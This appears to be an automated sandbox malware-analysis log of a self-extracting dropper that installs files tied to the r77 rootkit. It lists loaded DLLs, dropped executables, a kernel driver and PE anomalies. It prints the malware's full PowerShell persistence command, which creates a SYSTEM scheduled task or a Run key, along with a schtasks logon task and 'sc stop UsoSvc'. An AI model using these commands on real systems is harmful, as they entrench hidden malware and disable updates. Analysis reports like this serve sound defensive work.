                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: version.dll
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: wldp.dll
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: profapi.dll
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
                    Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
                    Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeSection loaded: apphelp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeDirectory created: C:\Program Files\CuisJump to behavior
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeDirectory created: C:\Program Files\Cuis\bonJump to behavior
                    Source: 5fr5gthkjdg71.exeStatic PE information: Image base 0x140000000 > 0x60000000
                    Source: 5fr5gthkjdg71.exeStatic file information: File size 6332216 > 1048576
                    Source: 5fr5gthkjdg71.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: 5fr5gthkjdg71.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: 5fr5gthkjdg71.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: 5fr5gthkjdg71.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: 5fr5gthkjdg71.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: 5fr5gthkjdg71.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: 5fr5gthkjdg71.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Source: 5fr5gthkjdg71.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb source: GR55Qg1hth.exe, 00000002.00000002.1972814852.000001B632A12000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb- source: GR55Qg1hth.exe, 00000002.00000002.1972814852.000001B632A12000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: sc.exe, kaptsegthwf.exe
                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: 5fr5gthkjdg71.exe, 00000000.00000003.1685559832.00000209BC0DE000.00000004.00000020.00020000.00000000.sdmp, 5fr5gthkjdg71.exe, 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmp, 5fr5gthkjdg71.exe, 00000000.00000003.1684931980.00000209BB8D2000.00000004.00000020.00020000.00000000.sdmp, 5fr5gthkjdg71.exe, 00000000.00000000.1682966370.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmp
                    Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\Install.pdb source: GR55Qg1hth.exe, 00000002.00000002.1972814852.000001B632A12000.00000004.00000020.00020000.00000000.sdmp
                    Source: 5fr5gthkjdg71.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: 5fr5gthkjdg71.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: 5fr5gthkjdg71.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: 5fr5gthkjdg71.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: 5fr5gthkjdg71.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }Jump to behavior
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 2_2_00007FF650241B90 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,2_2_00007FF650241B90
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeFile created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_4351390Jump to behavior
                    Source: F4R5fd8grr.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x89a47
                    Source: kaptsegthwf.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x2c24bb
                    Source: FA9.tmp.2.drStatic PE information: real checksum: 0x0 should be: 0x5841e
                    Source: 5fr5gthkjdg71.exeStatic PE information: real checksum: 0x0 should be: 0x60c190
                    Source: Bara.exe.2.drStatic PE information: real checksum: 0x260942 should be: 0x265c9d
                    Source: Client.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x89a47
                    Source: GR55Qg1hth.exe.0.drStatic PE information: real checksum: 0x260942 should be: 0x265c9c
                    Source: gfiKDLgr58thy4d.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x2c24bb
                    Source: 5fr5gthkjdg71.exeStatic PE information: section name: .didat
                    Source: 5fr5gthkjdg71.exeStatic PE information: section name: _RDATA
                    Source: gfiKDLgr58thy4d.exe.0.drStatic PE information: section name: .00cfg
                    Source: GR55Qg1hth.exe.0.drStatic PE information: section name: .xdata
                    Source: kaptsegthwf.exe.1.drStatic PE information: section name: .00cfg
                    Source: Bara.exe.2.drStatic PE information: section name: .xdata
                    Source: FA9.tmp.2.drStatic PE information: section name: _RDATA
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeCode function: 1_2_00007FF6880C1394 push qword ptr [00007FF6880CC004h]; ret 1_2_00007FF6880C1403
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 2_2_000001B630F7ACDD push rcx; retf 003Fh2_2_000001B630F7ACDE
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 2_2_000001B63117C6DD push rcx; retf 003Fh2_2_000001B63117C6DE
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 10_2_1B25ACDD push rcx; retf 003Fh10_2_1B25ACDE
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 10_2_1B89C6DD push rcx; retf 003Fh10_2_1B89C6DE
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 10_2_00007FFD9B892BF5 push eax; iretd 10_2_00007FFD9B892C4D
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 10_2_00007FFD9B892B95 push eax; iretd 10_2_00007FFD9B892C4D
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 10_2_00007FFD9B89CE80 push eax; ret 10_2_00007FFD9B89CEEC
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 10_2_00007FFD9B89752B push ebx; iretd 10_2_00007FFD9B89756A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD9B77D2A5 pushad ; iretd 19_2_00007FFD9B77D2A6
                    Source: C:\Windows\System32\conhost.exeCode function: 22_2_000001C25C75ACDD push rcx; retf 003Fh22_2_000001C25C75ACDE
                    Source: C:\Windows\System32\conhost.exeCode function: 22_2_000001C25C78C6DD push rcx; retf 003Fh22_2_000001C25C78C6DE
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD599ACDD push rcx; retf 003Fh63_2_0000017CD599ACDE
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5ADC6DD push rcx; retf 003Fh63_2_0000017CD5ADC6DE
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B09B0D push rcx; retf 003Fh63_2_0000017CD5B09B0E
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B3A70D push rcx; retf 003Fh63_2_0000017CD5B3A70E
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B6ACDD push rcx; retf 003Fh63_2_0000017CD5B6ACDE
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B9C6DD push rcx; retf 003Fh63_2_0000017CD5B9C6DE
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeCode function: 66_2_0000023E07F0ACDD push rcx; retf 003Fh66_2_0000023E07F0ACDE
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeCode function: 66_2_0000023E07F89B0D push rcx; retf 003Fh66_2_0000023E07F89B0E
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeCode function: 66_2_00007FF62DC41394 push qword ptr [00007FF62DC4C004h]; ret 66_2_00007FF62DC41403
                    Source: C:\Windows\System32\conhost.exeCode function: 68_2_000001A645CEACDD push rcx; retf 003Fh68_2_000001A645CEACDE
                    Source: C:\Windows\System32\conhost.exeCode function: 68_2_000001A645EFC6DD push rcx; retf 003Fh68_2_000001A645EFC6DE

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeFile created: C:\Windows\TEMP\dsarrsulkovb.sys
                    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeFile created: C:\Program Files\Cuis\bon\Bara.exeJump to dropped file
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeFile created: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeJump to dropped file
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeFile created: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeJump to dropped file
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeFile created: C:\Windows\Temp\dsarrsulkovb.sysJump to dropped file
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeFile created: C:\Users\user\Desktop\GR55Qg1hth.exeJump to dropped file
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeFile created: C:\Users\user\AppData\Local\Temp\FA9.tmpJump to dropped file
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeFile created: C:\Users\user\AppData\Roaming\SubDir\Client.exeJump to dropped file
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeFile created: C:\Users\user\Desktop\F4R5fd8grr.exeJump to dropped file
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeFile created: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeJump to dropped file
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeFile created: C:\Windows\Temp\dsarrsulkovb.sysJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\Desktop\F4R5fd8grr.exe" /rl HIGHEST /f
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\FA9.TMP
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeFile opened: C:\Users\user\Desktop\F4R5fd8grr.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeFile opened: C:\Users\user\AppData\Roaming\SubDir\Client.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeFile opened: C:\Users\user\AppData\Roaming\SubDir\Client.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeFile opened: C:\Users\user\Desktop\F4R5fd8grr.exe:Zone.Identifier read attributes | delete
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
